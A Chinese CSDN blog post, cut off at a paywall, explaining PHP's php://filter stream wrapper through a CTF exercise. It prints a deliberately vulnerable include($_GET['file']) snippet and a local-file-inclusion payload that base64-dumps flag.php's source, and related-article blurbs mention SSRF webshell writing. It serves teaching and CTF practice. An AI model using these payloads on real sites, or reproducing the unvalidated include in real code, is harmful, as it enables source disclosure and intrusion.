PHP伪协议保姆级总结

最新推荐文章于 2025-04-23 22:59:22 发布
置顶 最新推荐文章于 2025-04-23 22:59:22 发布
阅读量2k 收藏 19
点赞数 72
文章标签: php 开发语言 安全 网络 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_84893440/article/details/146434074
版权

​php://filter​

是 PHP 中的一个流封装协议,它允许你在读取或写入数据流时对数据进行过滤处理。这种封装器特别适用于那些在读取数据之前需要进行预处理的场合,比如对数据进行编码、解码、压缩或解压缩等。

示例

例如,如果你想对一个文件的内容进行 Base64 编码,可以使用 php://filter​ 结合 convert.base64-encode​ 过滤器来实现:

php复制

$data = file_get_contents('php://filter/read=convert.base64-encode/resource=/path/to/your/file');

这行代码首先通过 resource​ 指定要读取的文件路径,然后通过 read=convert.base64-encode​ 指定在读取文件内容时应用 Base64 编码过滤器。

例题

 <?php
error_reporting(0);
if (isset($_GET['file'])) {
    if ( substr($_GET["file"], 0, 3) === "php" ) {
        echo "Nice!!!";
        include($_GET["file"]);
    } 
 
    else {
        echo "Hacker!!";
    }
}else {
    highlight_file(__FILE__);
}
//flag.php

?file=php://filter/read=convert.base64-encode/resource=flag.php


<?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");


echo   "NSSCTF{flag_is_not_here}" ."<br/>";
echo "real_flag_is_in_'flag'"."
最低0.47元/天 解锁文章
great sages
关注
PHP伪协议详解:深入理解PHP流封装协议
03-21 1419
伪协议,也称为流封装协议,是PHP用于访问各种数据流的一种机制。通过伪协议开发者可以使用熟悉的文件系统函数,如fopen()fwrite()等,来访问和操作非文件资源。
PHP-伪协议
摘星怪sec的blog
04-25 7577
常用的伪协议有就可以利用使用文件包含函数包含文件时,文件中的代码会被执行,如果想要读取文件源码,可以使用对文件内容进行编码,编码后的文件内容不会被执行,而是展示在页面中,我们将页面中的内容使用解码,就可以获取文件的源码了。
PHP伪协议(封装协议/内置协议)
m0_52923241的博客
07-23 1649
PHP内置协议/封装协议/伪协议 PHP带有很多内置URL风格的封装协议,这类协议与fopen()、copy()、file_exists()、filesize()等文件系统函数所提供的功能类似;可结合文件包含进行漏洞利用 PHP封装协议: file:// — 访问本地文件系统 http:// — 访问 HTTP(s) 网址 ftp:// — 访问 FTP(s) URLs php:// — 访问各个输入/输出流(I/O streams) zlib:// — 压缩流 data:// — 数据(RFC 2397)
php 伪协议
热门推荐
Ni9htMar3的博客
04-09 2万+
php 伪协议 php:// php://filter
Dvwa 文件包含漏洞:保姆操作
chlet的博客
10-27 1427
Dvwa 文件包含漏洞 原理部分: PHP文件包含漏洞的产生原因是在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,就可能导致意外的文件泄露甚至恶意的代码注入。最常见的就属于本地文件包含(Local File Inclusion)漏洞了。 通过引入文件时,用户可控,没有严格的检验,或是被绕过,操作一些敏感文件,导致文件泄露和恶意代码注入 当包含文件在服务器本地上,就形成本地文件包含,当包含的文件在第三方服务器是,就形成可远程文件包含。 程序开发人员一般会把重复使用的
Typecho 入门指南:个人博客网站保姆攻略!
03-21 778
Typecho 是一款基于 PHP + MySQL/SQLite 的 轻量开源博客系统,专为内容创作者设计。其核心目标是提供 简洁、快速、高效 的博客搭建体验。
CTFHUB靶场关于SSRF保姆攻略
mirliasheong的博客
12-17 992
这里有一个题目附录,在这关我们需要用到一款名为Gopherus工具,还需要用到python2的环境,我这里是在kali做的,工具大家自己去下载。这里我们直接点旁边的X,结束,在访问一下shell.php,看看我们的木马是否写进去了。将结果复制,打开记事本,把%0a替换为%0d%0a,再把结尾加上%0d%0a。保存后带年纪浏览,选中这个木马文件,这个时候打开代理,准备抓包。
[网鼎杯 2018]Fakebook 1保姆解题思路
Welcome
11-16 1005
[网鼎杯 2018]Fakebook 1保姆解题思路。
遇见狂神书说:JavaWeb保姆教程
AfterLife1220的博客
07-18 577
JavaWeb 遇见狂神说B站视频:https://www.bilibili.com/video/BV12J411M7Sj 1. 基本概念 1.1 前言 web 开发: web,网页的意思:www.baidu.com 静态web html,css 提供给所有人看的数据,始终不会发生变化 动态web 提供给所有人看的数据始终会发生变化,每个人在不同的事件、不同的地点看到的信息各不相同。 淘宝、几乎所有的网站都是动态的 技术栈:servlet/JSP 在Java中,动态web资源开发的技术统称
MCP协议从原理到开发保姆教程.pdf
04-16
②构建具备多种功能的企业AI应用,如邮件发送、图像生成等;③学习如何通过MCP协议实现模型决策与工具执行的解耦,提升开发效率和用户体验。 阅读建议:本文适合有一定编程经验的读者,尤其是对AI模型集成有需求的...
计算机网络微课堂计算机网络保姆总结笔记,万字总结,一套带走
06-24
计算机网络微课堂计算机网络保姆总结笔记,万字总结,一套带走,是博主跟着B站up主湖科大教书匠 的 计算机网络微课堂,进行的总结
中视频项目保姆实战教程-视频教程网盘链接提取码下载 .txt
05-22
十节视频课,主要讲内容制作和账号运营:包括选题、素材、文案、配音、剪辑以及运营维护的一些实战经验和实操演示。我讲的都是我们自己做出结果的,适合大家去模仿复制的实战玩法。通过这十节课,你能快速掌握中视频...
微信聊天机器人保姆部署视频教程+工具+源码.rar
11-10
微信聊天机器人保姆部署视频教程+工具+源码微信聊天机器人保姆部署视频教程+工具+源码微信聊天机器人保姆部署视频教程+工具+源码微信聊天机器人保姆部署视频教程+工具+源码微信聊天机器人保姆部署视频教程...
Apache中间件解析漏洞与安全加固
最新发布
w2361734601的博客
04-23 358
Apache的安全性依赖于对解析逻辑的严格管控和纵深防御体系的构建。运维人员需定期审计配置(如检查.htaccess权限)、模拟渗透测试(使用OWASP ZAP等工具),并通过模块精简、权限最小化持续优化防护策略。正如安全领域的“木桶效应”,只有补齐每一块短板,才能确保服务器在复杂威胁环境下的稳健运行。
OSPF综合实验
2301_81073010的博客
04-23 621
在 AR1、AR2、R3、R4、R6、R7 等设备上执行 ping 100.1.1.1,均收到回复,表明 R4 成功将指向 R5 环回的静态路由引入 OSPF,所有设备可访问 R5 环回地址,满足 “所有设备均可访问 R5 环回” 需求。1.R5 仅配置 IP 地址,其环回地址固定为 100.1.1.1/32,与直连设备(如 R3、R4、R6、R7 等)的接口使用公有 IP 地址,确保与外部网络的连接。其他设备间互 ping 均成功,表明全网各设备间路由可达,满足 “全网可达” 需求。
H5付费进群源码 带分销【源码+教程】虚拟货物系统
爱酷码的博客
04-22 526
nginx1.2 php5.6–7.2均可最好是7.2第一步:上传文件程序到网站根目录解压第二步:导入数据库(数据库.sql)第三步:修改/config/database.php里面的数据库地址第四步:修改/config/extra/ip.php里面的域名第四步:设置伪静态thinkphp总后台账号:18888888888密码123456分销后台:域名+fenxiao.php分站后台:域名+substation.php功能使用说明,每个功能旁边都会有示例截图。
Discuz!与DeepSeek的深度融合:打造智能网址导航新标杆
weixin_45788582的博客
04-21 1042
Discuz!与DeepSeek的深度融合,为网址导航网站的智能化转型提供了强有力的支持。通过智能内容筛选与优化、智能用户互动与留存以及智能商业化探索,网址导航网站能够打造更加优质、互动、繁荣的社区生态。未来,随着AI技术的不断发展和应用场景的拓展,我们有理由相信,Discuz!与DeepSeek的深度融合将为网址导航网站带来更加广阔的发展空间和无限可能。让我们共同期待,一个更加智能、高效、繁荣的网址导航新时代即将到来!
Day-1 漏洞攻击实战
2201_75999912的博客
04-21 1693
得到flag{fabbf4abe040f2fdac8234099facdccb}%23 转译为# ‘1’ 应该与压缩包内的php文件同名。发现存在www.zip文件(管理员备份文件)生成shell.php文件(未生成)存在数据库后台登录账号密码。,使用中国蚁剑成功连接。
Visual Studio Code 配置 PHP 保姆教程
03-18
### 如何在 Visual Studio Code 中配置 PHP #### 安装必要的扩展 为了更好地支持 PHP 开发,在 Visual Studio Code 中可以安装一些常用的插件来增强功能。以下是几个推荐的插件及其作用: - **PHP Intelephense**:...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值